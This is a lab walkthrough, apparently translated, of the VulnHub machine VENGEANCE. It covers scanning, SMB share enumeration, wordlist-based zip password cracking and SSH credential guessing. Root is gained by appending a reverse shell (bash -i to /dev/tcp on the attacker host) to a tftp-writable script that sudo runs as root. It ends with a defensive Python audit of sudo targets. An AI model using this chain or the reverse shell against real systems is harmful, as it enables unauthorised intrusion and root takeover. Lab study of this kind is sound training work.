Target Machine Penetration Practice 58 - digitalworld.local: VENGEANCE
Target machine description
Target machine address: https://www.vulnhub.com/entry/digitalworldlocal-vengeance,704/
Description
2021 brings us the VENGEANCE of digitalworld.local! A box born out of COVID-19. This machine was built whilst the author was mulling over life in infosec whilst doing his PEN-300 course. But the author always has a heart for the OSCP, which explains yet another OSCP-like box, full of enumeration goodness.
If you MUST have hints for this machine (even though they will probably not help you very much until you root the box!): VENGEANCE is (#1): all about users making use of other users, (#2): broken hearts, (#3): broken minds.
Note: Always think like a user when enumerating target machine.
Feel free to contact the author at https://donavan.sg/blog if you would like to drop a comment.
1. Setting up the target environment
Attack machine (Kali): IP address 192.168.128.128
Target machine: IP address 192.168.128.133
Note: the target and Kali only need to be on the same LAN (same subnet, i.e. both VMs use the same network mode).
The target environment is set up as follows:
- Import the downloaded target image into VMware Workstation and set its network to NAT mode.
2. Hands-on
2.1 Network scanning
2.1.1 Start the target and Kali, then scan
Method 1: arp-scan -I eth0 -l (scan on a specified interface)
arp-scan -I eth1 -l
⬢ VENGEANCE arp-scan -I eth1 -l
Interface: eth1, type: EN10MB, MAC: 00:0c:29:b5:12:9d, IPv4: 192.168.128.128
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.128.1 00:50:56:c0:00:08 VMware, Inc.
192.168.128.2 00:50:56:f4:41:f5 VMware, Inc.
192.168.128.133 00:0c:29:85:46:6e VMware, Inc.
192.168.128.254 00:50:56:fb:5c:73 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.931 seconds (132.57 hosts/sec). 4 responded
Method 2: masscan <subnet> -p <ports>
masscan 192.168.184.0/24 -p 80,22
Method 3: netdiscover -i <interface> -r <subnet>
netdiscover -i eth0 -r 192.168.184.0/24
Method 4: left for readers to add
2.1.2 Check which ports the target has open
Use nmap -A -sV -T4 -p- <target IP>
to list the target's open ports:
⬢ kali nmap -A -sV -T4 -p- 192.168.128.133
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-25 11:31 CST
Nmap scan report for bogon (192.168.128.133)
Host is up (0.00032s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
7/tcp closed echo
22/tcp closed ssh
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_auth-owners: www-data
|_http-title: VENGEANCE – Confessions of a girl who has been cornered ...
88/tcp closed kerberos-sec
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL STLS UIDL RESP-CODES TOP PIPELINING AUTH-RESP-CODE CAPA
|_auth-owners: dovenull
113/tcp open ident?
|_auth-owners: root
139/tcp open netbios-ssn Samba smbd 4.6.2
|_auth-owners: root
143/tcp open imap Dovecot imapd (Ubuntu)
|_auth-owners: dovenull
|_imap-capabilities: SASL-IR ID Pre-login IDLE STARTTLS IMAP4rev1 OK listed post-login more ENABLE capabilities LOGINDISABLEDA0001 LOGIN-REFERRALS have LITERAL+
161/tcp closed snmp
389/tcp closed ldap
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=VENGEANCE/organizationName=Good Tech Inc/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2021-02-14T02:40:28
|_Not valid after: 2022-02-14T02:40:28
| tls-nextprotoneg:
| h2
|_ http/1.1
| tls-alpn:
| h2
|_ http/1.1
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: VENGEANCE – Confessions of a girl who has been cornered ...
|_auth-owners: www-data
445/tcp open netbios-ssn Samba smbd 4.6.2
|_auth-owners: root
993/tcp open tcpwrapped
995/tcp open tcpwrapped
1337/tcp closed waste
2049/tcp closed nfs
6000/tcp closed X11
8080/tcp closed http-proxy
22222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 32:eb:05:fa:d3:75:45:5e:c7:72:fb:03:aa:05:b7:d7 (RSA)
| 256 40:16:f8:d1:f1:06:e5:aa:13:44:28:ed:e0:55:ef:34 (ECDSA)
|_ 256 52:78:15:c2:3b:a1:90:20:3a:b1:d6:75:93:72:d8:f8 (ED25519)
|_auth-owners: root
54321/tcp closed unknown
MAC Address: 00:0C:29:85:46:6E (VMware)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-03-25T03:34:11
|_ start_date: N/A

TRACEROUTE
HOP RTT ADDRESS
1 0.31 ms bogon (192.168.128.133)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 207.62 seconds
The following ports are open:
80—http—nginx 1.18.0 (Ubuntu)
110—pop3—Dovecot pop3d
113—ident?
139—netbios-ssn—Samba smbd 4.6.2
143—imap—Dovecot imapd (Ubuntu)
443—ssl/http—nginx 1.18.0 (Ubuntu)
445—netbios-ssn—Samba smbd 4.6.2
993—tcpwrapped
995—tcpwrapped
22222—ssh—OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
2.2 Enumerating vulnerabilities
2.2.1 Port 80 analysis
Visit http://192.168.128.133/
The page shows that vengeance.goodtech.inc must be added to /etc/hosts.
Visit http://vengeance.goodtech.inc/
It is a WordPress site; a quick look turns up nothing of note.
Scan for directories: dirsearch -u http://vengeance.goodtech.inc
⬢ VENGEANCE dirsearch -u http://vengeance.goodtech.inc

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/vengeance.goodtech.inc/_22-03-25_14-49-12.txt

Error Log: /root/.dirsearch/logs/errors-22-03-25_14-49-12.log

Target: http://vengeance.goodtech.inc/

[14:49:12] Starting:
[14:49:12] 200 - 220B - /.bash_logout
[14:49:12] 200 - 4KB - /.bashrc
[14:49:13] 403 - 564B - /.ht_wsr.txt
[14:49:13] 403 - 564B - /.htaccess.orig
[14:49:13] 403 - 564B - /.htaccess.sample
[14:49:13] 403 - 564B - /.htaccess.save
[14:49:13] 403 - 564B - /.htaccess_orig
[14:49:13] 403 - 564B - /.htaccess_extra
[14:49:13] 403 - 564B - /.htaccess.bak1
[14:49:13] 403 - 564B - /.htaccessOLD
[14:49:13] 403 - 564B - /.htaccessBAK
[14:49:13] 403 - 564B - /.htaccessOLD2
[14:49:13] 403 - 564B - /.htaccess_sc
[14:49:13] 403 - 564B - /.htm
[14:49:13] 403 - 564B - /.html
[14:49:13] 403 - 564B - /.httr-oauth
[14:49:13] 403 - 564B - /.htpasswd_test
[14:49:13] 403 - 564B - /.htpasswds
[14:49:13] 200 - 807B - /.profile
[14:49:17] 403 - 564B - /admin/.htaccess
[14:49:19] 403 - 564B - /administrator/.htaccess
[14:49:20] 403 - 564B - /app/.htaccess
[14:49:27] 200 - 19KB - /license.txt
[14:49:31] 301 - 0B - /index.php -> http://vengeance.goodtech.inc/
[14:49:32] 200 - 7KB - /readme.html
[14:49:37] 301 - 178B - /wp-admin -> http://vengeance.goodtech.inc/wp-admin/
[14:49:37] 403 - 3KB - /wp-admin/
[14:49:37] 200 - 1KB - /wp-admin/install.php
[14:49:37] 400 - 1B - /wp-admin/admin-ajax.php
[14:49:37] 200 - 0B - /wp-config.php
[14:49:37] 409 - 3KB - /wp-admin/setup-config.php
[14:49:37] 301 - 178B - /wp-content -> http://vengeance.goodtech.inc/wp-content/
[14:49:37] 200 - 0B - /wp-content/
[14:49:37] 200 - 69B - /wp-content/plugins/akismet/akismet.php
[14:49:37] 403 - 564B - /wp-content/uploads/
[14:49:37] 200 - 0B - /wp-cron.php
[14:49:37] 403 - 564B - /wp-includes/
[14:49:37] 301 - 178B - /wp-includes -> http://vengeance.goodtech.inc/wp-includes/
[14:49:37] 200 - 0B - /wp-includes/rss-functions.php
[14:49:37] 403 - 564B - /wp-content/upgrade/
[14:49:37] 405 - 42B - /xmlrpc.php

Task Completed
⬢ VENGEANCE
A quick scan turns up nothing special, and the page source is unremarkable too.
2.2.2 SMB analysis
Scan with enum4linux: enum4linux 192.168.128.133 | tee vengance.txt
The scan reveals an SMB share named sarapublic$
and two system users: sara and qinyi.
Use smbclient (with -N for a null session, no password) to look at the sarapublic$ share:
⬢ VENGEANCE smbclient -N \\\\192.168.128.133\\sarapublic$
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Mar  8 18:28:35 2021
  ..                                  D        0  Mon Mar  8 18:29:24 2021
  eaurouge.txt                        N       11  Mon Mar  8 10:46:53 2021
  eaurouge                            N      110  Tue Feb 23 19:06:40 2021
  essay.txt                           N     1257  Mon Mar  8 18:28:34 2021
  gio.zip                             N 11150297  Sun Feb 21 13:48:13 2021
  cognac                              D        0  Wed Feb 24 01:48:47 2021
  blurb.txt                           N      525  Mon Mar  8 10:55:24 2021
  champagne                           D        0  Wed Feb 24 00:15:07 2021
  profile.txt                         N      337  Mon Mar  8 10:45:26 2021

                19475088 blocks of size 1024. 10933384 blocks available
smb: \>
Download all of them:
smb: \> get eaurouge.txt
getting file \eaurouge.txt of size 11 as eaurouge.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \> get eaurouge
getting file \eaurouge of size 110 as eaurouge (4.5 KiloBytes/sec) (average 2.6 KiloBytes/sec)
smb: \> get essay.txt
getting file \essay.txt of size 1257 as essay.txt (72.2 KiloBytes/sec) (average 21.7 KiloBytes/sec)
smb: \> get gio.zip
getting file \gio.zip of size 11150297 as gio.zip (21865.4 KiloBytes/sec) (average 19447.0 KiloBytes/sec)
smb: \> get cognac
NT_STATUS_FILE_IS_A_DIRECTORY opening remote file \cognac
smb: \> get blurb.txt
getting file \blurb.txt of size 525 as blurb.txt (25.6 KiloBytes/sec) (average 18777.3 KiloBytes/sec)
smb: \> get profile.txt
getting file \profile.txt of size 337 as profile.txt (7.0 KiloBytes/sec) (average 17370.3 KiloBytes/sec)
smb: \> cd cognac\
smb: \cognac\> ls -al
NT_STATUS_NO_SUCH_FILE listing \cognac\-al
smb: \cognac\> ls
  .                                   D        0  Wed Feb 24 01:48:47 2021
  ..                                  D        0  Mon Mar  8 18:28:35 2021
  to-do                               N      200  Wed Feb 24 01:48:47 2021

                19475088 blocks of size 1024. 10933376 blocks available
smb: \cognac\> get to-do
getting file \cognac\to-do of size 200 as to-do (6.1 KiloBytes/sec) (average 16527.1 KiloBytes/sec)
smb: \cognac\> cd ..
smb: \> cd champagne\
smb: \champagne\> ls
  .                                   D        0  Wed Feb 24 00:15:07 2021
  ..                                  D        0  Mon Mar  8 18:28:35 2021
  www.domperignon.com                 D        0  Wed Feb 24 00:07:08 2021

                19475088 blocks of size 1024. 10933372 blocks available
smb: \champagne\> cd www.domperignon.com\
smb: \champagne\www.domperignon.com\> ls
  .                                   D        0  Wed Feb 24 00:07:08 2021
  ..                                  D        0  Wed Feb 24 00:15:07 2021
  sites                               D        0  Wed Feb 24 00:04:56 2021
  robots.txt                          N    17739  Wed Feb  3 00:00:17 2021
  index.html.tmp                      N    18766  Wed Feb  3 00:00:17 2021
  ruxitagentjs_ICA27SVfjqrx_10203201027145855.js      N   193811  Thu Dec 10 23:23:49 2020
  fr-fr                               D        0  Wed Feb 24 00:09:25 2021
  ww-fr                               D        0  Wed Feb 24 00:06:57 2021
  ww-en                               D        0  Wed Feb 24 00:04:55 2021
  misc                                D        0  Wed Feb 24 00:09:17 2021
  ww-es                               D        0  Wed Feb 24 00:07:10 2021

                19475088 blocks of size 1024. 10933372 blocks available
smb: \champagne\www.domperignon.com\> get robots.txt
getting file \champagne\www.domperignon.com\robots.txt of size 17739 as robots.txt (173.2 KiloBytes/sec) (average 14372.4 KiloBytes/sec)
smb: \champagne\www.domperignon.com\>
Look at their contents.
blurb.txt contains:
⬢ VENGEANCE cat blurb.txt
Blurb about guards:
How do you guard against a thief from the inside?

Blurb about workers:
Why do workers always set passwords related to their jobs?

Blurb about security:
Security has both "U" and "I" in it. Everyone must do their part!

Blurb about passwords:
Passwords are words that guard the pass.

Blurb about nonsense:
Sense is a subset of "nonsense"; all sensible talk, to others who don't understand, can be construed as nonsense.

Blurb about trying harder:
We all try harder in whatever we do. Try harder!
eaurouge contains:
⬢ VENGEANCE cat eaurouge
#!/bin/bash
# I don't know how to script stuff... so I'm trying something.
echo 'I am silly' > eaurouge.txt
⬢ VENGEANCE
eaurouge.txt contains:
⬢ VENGEANCE cat eaurouge.txt
I am silly
⬢ VENGEANCE
essay.txt contains:
⬢ VENGEANCE cat essay.txt
One fine morning, I looked out of the window and saw the sun rise.

It was a frenetic Friday. Amidst the warm sun rays projecting its glow through my room, there was a mad dash to solve a serious issue back at HQ. It felt eerily close.

Our servers were hacked.

We were in real trouble. The daydreaming had to stop. Without brushing my teeth, I stormed out of the house and prayed that it will all be OK.

Except things were anything except OK. The attackers seemed to have taken control of our development domain. This was apocalyptic.

The attackers managed to make away with our nanotechnological intellectual property. Additionally, the attackers deleted our latest development product, the ARCEUS X-FORCE. It was unknown if the attackers decided to sell ARCEUS X-FORCE illegally.

On closer inspection, we realised that this was an insider job. Govindasamy did an investigation, revealing that Qinyi was attempting to log into the development servers without prior permission. That was clearly a red flag, resulting in Govindasamy looking through her access rights.

We discovered that, due to a misconfiguration, she had granted herself access rights that were otherwise not supposed to have been granted. We have since removed these access rights.
⬢ VENGEANCE
profile.txt contains:
⬢ VENGEANCE cat profile.txt
Draft profile for Giovanni:
- worked in nanotechnological fields for 15 years
- hails from Milan
- worked on CNTs, graphene for device fabrication
- CEO of multiple nanotech firms in Tokyo, Singapore and Milan
- collaborating with Good Tech Inc. on R&D project
- keynote speaker of the "Good Tech Inc. Chip Fabrication Project" in 2019
⬢ VENGEANCE
to-do contains:
⬢ VENGEANCE cat to-do
1. compare between martell, remy martin, hennesey, courvoiser.
2. decide how we want to advertise the cognac brand we pick.
3. investigate why qinyi's looking into carbon nanotubes all of a sudden.
⬢ VENGEANCE
None of these contain anything directly exploitable.
robots.txt contains nothing useful either.
gio.zip is password-protected.
The password is probably hidden in the files downloaded above, so first turn those files into a wordlist with the cewl wordlist generator: start a local HTTP server (here the files are served from 192.168.128.128:8000), then let cewl crawl each file and extract its words into the wordlist:
cewl 192.168.128.128:8000/blurb.txt >> pass.txt
cewl 192.168.128.128:8000/eaurouge >> pass.txt
cewl 192.168.128.128:8000/eaurouge.txt >> pass.txt
cewl 192.168.128.128:8000/essay.txt >> pass.txt
cewl 192.168.128.128:8000/profile.txt >> pass.txt
cewl 192.168.128.128:8000/to-do >> pass.txt
Use the generated wordlist to crack the zip password (password.txt holds the PKZIP hash extracted from gio.zip beforehand, the kind zip2john produces; that step is not shown here):
⬢ VENGEANCE john --wordlist=pass.txt password.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
nanotechnological (gio.zip)
1g 0:00:00:00 DONE (2022-03-25 15:28) 100.0g/s 24600p/s 24600c/s 24600C/s Blurb..sudden
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
⬢ VENGEANCE
Extract the archive and look at its contents:
⬢ VENGEANCE unzip gio.zip
Archive: gio.zip
   creating: gio/
[gio.zip] gio/pass_reminder.txt password:
 extracting: gio/pass_reminder.txt
  inflating: gio/ted_talk.pptx
  inflating: gio/tryharder.png
⬢ VENGEANCE cd gio
⬢ gio ls -al
总用量 11400
drwxr-xr-x 2 root root 4096 2月 15 2021 .
drwxr-xr-x 3 hirak0 kali 4096 3月 25 15:31 ..
-rw-r--r-- 1 root root 19 2月 15 2021 pass_reminder.txt
-rw-r--r-- 1 root root 11111194 2月 15 2021 ted_talk.pptx
-rw-r--r-- 1 root root 547545 2月 15 2021 tryharder.png
pass_reminder.txt contains:
name_corner_circuit#
i.e. name _ corner (a sharp bend in a road) _ circuit
The PPT has nothing of note; set it aside for now.
The image was inspected for hidden data, with no findings.
Looking back, name_corner_circuit seems to relate to the PPT:
page 1 of the PPT has the name Giovanni Berlusconi, and page 3 has Suzuka 130R. Splitting that up, 130R is a corner and Suzuka is the circuit.
Try combining these into candidate passwords:
Giovanni Berlusconi_130R_Suzuka
Giovanni Berlusconi_130r_Suzuka
Giovanni Berlusconi_130R_suzuka
Giovanni Berlusconi_130r_suzuka
giovanni berlusconi_130R_Suzuka
giovanni berlusconi_130R_suzuka
giovanni berlusconi_130r_Suzuka
giovanni berlusconi_130r_suzuka
Giovanni_130R_Suzuka
Giovanni_130r_Suzuka
Giovanni_130R_suzuka
Giovanni_130r_suzuka
giovanni_130R_Suzuka
giovanni_130R_suzuka
giovanni_130r_Suzuka
giovanni_130r_suzuka
The two users found earlier were sara and qinyi; try logging in as each.
Eventually the user qinyi with password giovanni_130R_Suzuka logs in successfully:
⬢ VENGEANCE ssh qinyi@192.168.128.133 -p 22222
The authenticity of host '[192.168.128.133]:22222 ([192.168.128.133]:22222)' can't be established.
ED25519 key fingerprint is SHA256:JGuTJL+RnrYpqCe3omn+FyXX8w820/GJnu5EbbpjcW4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.128.133]:22222' (ED25519) to the list of known hosts.
qinyi@192.168.128.133's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-65-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri 25 Mar 2022 07:54:56 AM UTC

  System load:  0.0               Processes:               234
  Usage of /:   38.7% of 18.57GB  Users logged in:         0
  Memory usage: 20%               IPv4 address for ens33:  192.168.128.133
  Swap usage:   0%

15 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

qinyi@vengeance:~$
2.3 Exploitation
……
2.4 Privilege escalation
2.4.1 Information gathering
After logging in, gather information:
uid=1001(qinyi) gid=1001(qinyi) groups=1001(qinyi)
qinyi@vengeance:~$ sudo -l
Matching Defaults entries for qinyi on vengeance:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User qinyi may run the following commands on vengeance:
    (root) NOPASSWD: /bin/systemctl restart nginx, /home/sara/private/eaurouge
qinyi@vengeance:~$ /home/sara/private/eaurouge
-bash: /home/sara/private/eaurouge: Permission denied
qinyi@vengeance:~$
So /home/sara/private/eaurouge can be run as root through sudo, but the logged-in user is qinyi, who has no permission even to read it.
Use pspy64 to gather more information:
qinyi@vengeance:/tmp$ wget http://192.168.128.128/pspy64
--2022-03-25 08:00:04-- http://192.168.128.128/pspy64
Connecting to 192.168.128.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64              100%[=======================================================>]   2.94M  --.-KB/s    in 0.05s

2022-03-25 08:00:04 (59.7 MB/s) - ‘pspy64’ saved [3078592/3078592]

qinyi@vengeance:/tmp$
pspy shows a tftp service on port 69 serving the /home/sara/private directory, yet that port did not appear in the earlier scan: the nmap run above used -p- without -sU, so it covered all TCP ports but never probed UDP.
Scan that port on its own to see whether it is really open:
⬢ VENGEANCE nmap -sU -p69 192.168.128.133
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-25 16:18 CST
Nmap scan report for vengeance.goodtech.inc (192.168.128.133)
Host is up (0.00022s latency).

PORT STATE SERVICE
69/udp open|filtered tftp
MAC Address: 00:0C:29:85:46:6E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds
qinyi@vengeance:/tmp$ netstat -a | grep tftp
udp 0 0 0.0.0.0:tftp 0.0.0.0:*
udp6 0 0 [::]:tftp [::]:*
qinyi@vengeance:/tmp$
It really is running, so fetch /home/sara/private/eaurouge and take a look:
⬢ VENGEANCE tftp 192.168.128.133
tftp> ls
?Invalid command
tftp> get eaurouge
Received 184 bytes in 0.1 seconds
tftp> q
Check its contents:
⬢ VENGEANCE cat eaurouge
#!/bin/bash
touch /home/sara/public/test.txt
echo "Test file" > /home/sara/public/test.txt
chown sara:sara /home/sara/public/test.txt
chmod 644 /home/sara/public/test.txt
⬢ VENGEANCE
Append a reverse shell to the end of the script: bash -c 'exec bash -i &>/dev/tcp/192.168.128.128/6666 <&1'
⬢ VENGEANCE vim eaurouge
⬢ VENGEANCE cat eaurouge
#!/bin/bash
touch /home/sara/public/test.txt
echo "Test file" > /home/sara/public/test.txt
chown sara:sara /home/sara/public/test.txt
chmod 644 /home/sara/public/test.txt
bash -c 'exec bash -i &>/dev/tcp/192.168.128.128/6666 <&1'
⬢ VENGEANCE
Upload it back to the target over tftp (the same daemon that served the file also accepts writes into that directory):
⬢ VENGEANCE tftp 192.168.128.133
tftp> put eaurouge
Sent 246 bytes in 0.0 seconds
tftp>
Listen locally on Kali: nc -lvp 6666
Then run the eaurouge file via sudo:
qinyi@vengeance:/tmp$ sudo /home/sara/private/eaurouge
Privilege escalation succeeds and the flag is obtained:
⬢ VENGEANCE nc -lvp 6666
listening on [any] 6666 ...
connect to [192.168.128.128] from vengeance.goodtech.inc [192.168.128.133] 38256
root@vengeance:/tmp# cd /root
cd /root
root@vengeance:~# ls
ls
proof.txt
snap
vengeance.crt
vengeance.key
root@vengeance:~# cat proof.txt
cat proof.txt
Root access obtained!

Congratulations on breaking through the 6th box in the digitalworld.local series. Hope you enjoyed this one.
root@vengeance:~#
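The root cause here is a sudo NOPASSWD rule pointing at a script under a user's home directory that a network service (tftpd) can overwrite. As an added defender-side check, not code from the page or the box, the script below parses the sudo -l rule shown above (the sample text is constructed from it) and audits each target's ownership and permissions, the stat-visible half of that pattern; it assumes a Linux host and cannot see the TFTP write path, so a non-root-owned target or parent directory is treated as a finding on its own.

```python
"""Audit 'sudo -l' NOPASSWD targets for the 'user writes what root runs' pattern."""
import os
import re
import stat
from typing import List

NOPASSWD_RE = re.compile(r"\(root\)\s+NOPASSWD:\s*(.+)")

# Constructed sample: the rule 'sudo -l' printed for qinyi on the VENGEANCE box.
SAMPLE_SUDO_L = (
    "User qinyi may run the following commands on vengeance:\n"
    "    (root) NOPASSWD: /bin/systemctl restart nginx, /home/sara/private/eaurouge\n"
)


def parse_nopasswd_targets(sudo_l_output: str) -> List[str]:
    """Return the executable paths root will run for the caller without a password."""
    targets = []
    for line in sudo_l_output.splitlines():
        m = NOPASSWD_RE.search(line)
        if not m:
            continue
        for cmd in m.group(1).split(","):
            targets.append(cmd.strip().split()[0])  # keep the path, drop arguments
    return targets


def classify(owner_uid, gid, mode, parent_uid, parent_mode, caller_uid, caller_gids):
    """Pure check on stat fields; returns human-readable findings (empty list = ok)."""
    findings = []
    if owner_uid != 0:
        findings.append(f"target owned by uid {owner_uid}, not root")
    if owner_uid == caller_uid:
        findings.append("target owned by the sudo caller")
    if mode & stat.S_IWOTH:
        findings.append("target world-writable")
    if mode & stat.S_IWGRP and gid in caller_gids:
        findings.append("target group-writable by a caller group")
    if parent_uid != 0:
        findings.append(f"parent dir owned by uid {parent_uid}, not root")
    if parent_mode & stat.S_IWOTH and not parent_mode & stat.S_ISVTX:
        findings.append("parent dir world-writable without sticky bit")
    return findings


def audit_path(path: str, caller_uid: int, caller_gids) -> List[str]:
    """Stat a real target and its parent directory, then classify them."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        # A dangling rule is still dangerous: whoever can create the file decides what root runs.
        return ["target missing: whoever can create it decides what root runs"]
    pst = os.stat(os.path.dirname(path) or "/")
    return classify(st.st_uid, st.st_gid, st.st_mode, pst.st_uid, pst.st_mode,
                    caller_uid, caller_gids)


if __name__ == "__main__":
    # Run as the sudo caller on the host being audited (Linux assumed).
    for target in parse_nopasswd_targets(SAMPLE_SUDO_L):
        print(target, audit_path(target, os.getuid(), os.getgroups()))
```

Run it on the box as qinyi to see /bin/systemctl come back clean while /home/sara/private/eaurouge is flagged; the fix is to keep sudo targets root-owned, non-writable, in root-owned directories, and never exported by a writable TFTP share.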
Summary
This box starts with enum4linux information gathering, which yields the SMB share and the usernames; smbclient downloads the files in the share; cewl builds a wordlist that cracks the zip password; finally, privileges are escalated through sudo.
- enum4linux information gathering
- smbclient file download
- cewl wordlist generation
- sudo privilege escalation